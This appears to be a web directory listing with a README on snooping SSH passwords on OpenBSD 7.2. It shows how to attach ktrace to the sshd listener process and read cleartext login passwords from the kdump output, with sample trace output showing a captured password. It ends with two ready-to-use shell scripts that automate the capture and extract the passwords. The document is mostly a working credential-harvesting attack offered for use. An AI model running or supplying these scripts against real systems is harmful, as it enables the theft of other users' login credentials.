Index of /OpenBSD/SSH-SNOOPING/
Name | Last Modified | Size | Type |
../ | | - | Directory |
README.txt | 2022-Oct-24 08:25:07 | 3.5K | text/plain; charset=utf-8 |
____ ____ __ __
/\ _`\ /\ _`\ /\ \/\ \ __
\ \,\L\_\ \,\L\_\ \ \_\ \ ____ ___ ___ ___ _____ /\_\ ___ __
\/_\__ \\/_\__ \\ \ _ \ /',__\ /' _ `\ / __`\ / __`\/\ '__`\/\ \ /' _ `\ /'_ `\
/\ \L\ \/\ \L\ \ \ \ \ \ /\__, `\/\ \/\ \/\ \L\ \/\ \L\ \ \ \L\ \ \ \/\ \/\ \/\ \L\ \
\ `\____\ `\____\ \_\ \_\ \/\____/\ \_\ \_\ \____/\ \____/\ \ ,__/\ \_\ \_\ \_\ \____ \
\/_____/\/_____/\/_/\/_/ \/___/ \/_/\/_/\/___/ \/___/ \ \ \/ \/_/\/_/\/_/\/___L\ \
\ \_\ /\____/
\/_/ \_/__/
-------------------------------------
SSH password snooping on OpenBSD 7.2
-------------------------------------
# First get a parent PID of the SSHD
openbsd72# ps -aux | grep ssh | grep -v grep
root 17831 0.0 0.0 1100 1176 ?? I 1:06PM 0:00.14 sshd: /usr/sbin/sshd [listener] 0 of 10-100 startups (sshd)
root 42012 0.0 0.1 1172 3568 ?? I 1:06PM 0:00.51 sshd: user [priv] (sshd)
user 73361 0.1 0.1 1672 3456 ?? S 1:06PM 0:25.17 sshd: user@ttyp0 (sshd)
openbsd72#
In this case it will be the PID 17831
# Then initiate ktrace on the PID and all the corresponding IO
ktrace -idg 17831
rm ktrace.out < ! This is important otherwise it will just grow big and fill up disk >
ktrace -ti -p 17831
# It will produce a ktrace.out file in the current $PATH
# Then test and SSH to the box from outside using some dummy wrong password
# I have used a dummy password "FUCKTHIS"
# Read the text from the ktrace.out via kdump
kdump -f ktrace.out
# The cleartext password supplied to the SSHD is located in a few places, but the most
reliable one I could see is just above the NAMI /usr/libexec/auth/login_passwd filename lookup call
43482 sshd RET write 1
13409 sshd CALL dup2(8,3)
13409 sshd RET dup2 3
43482 sshd CALL write(5,0x1f15487218,0x9)
43482 sshd GIO fd 5 wrote 9 bytes
"FUCKTHIS\0"
43482 sshd RET write 9
13409 sshd CALL closefrom(4)
43482 sshd CALL read(5,0x1ef4282068,0x2000)
13409 sshd RET closefrom 0
13409 sshd CALL execve(0x7ffffe3da0,0x7ffffe3a08,0x1f2a1f2210)
13409 sshd NAMI "/usr/libexec/auth/login_passwd"
13409 sshd ARGS
[0] = "passwd"
[1] = "-s"
[2] = "response"
[3] = "--"
[4] = "user"
[5] = "staff"
13409 login_passwd NAMI "/usr/libexec/ld.so"
# To stop all ktrace dumping run
ktrace -C
# In order to automate all the above here are 2 simple scripts
# START-SNOOP-SSH.sh
echo " /----------------------------/"
echo " / OpenBSD OpenSSH SNOOPER / "
echo "/----------------------------/ "
echo "started to dump SSHD process"
sshpid=$(ps -aux | grep "\/usr\/sbin\/sshd" | awk '{print $2}')
ktrace -idg $sshpid
rm -f ktrace.out
ktrace -ti -p $sshpid
echo ""
echo "Now wait for somebody to SSH to this machine with a password"
----------------------------------------------------------
# READ-SNOOP-SSH.sh
kdump -f ktrace.out > TEXT
grep -A 6 -B 8 -R "NAMI \"\/usr\/libexec\/auth\/login_passwd\"" TEXT |grep -v GIO | grep -v RET | grep -v CALL | grep -v ARGS | grep -v NAMI | grep -v "\[0\]" | grep -v "\[1\]" | grep -v "\[3\]" | grep -v "\[2\]"
rm -f TEXT
----------------------------------------------------------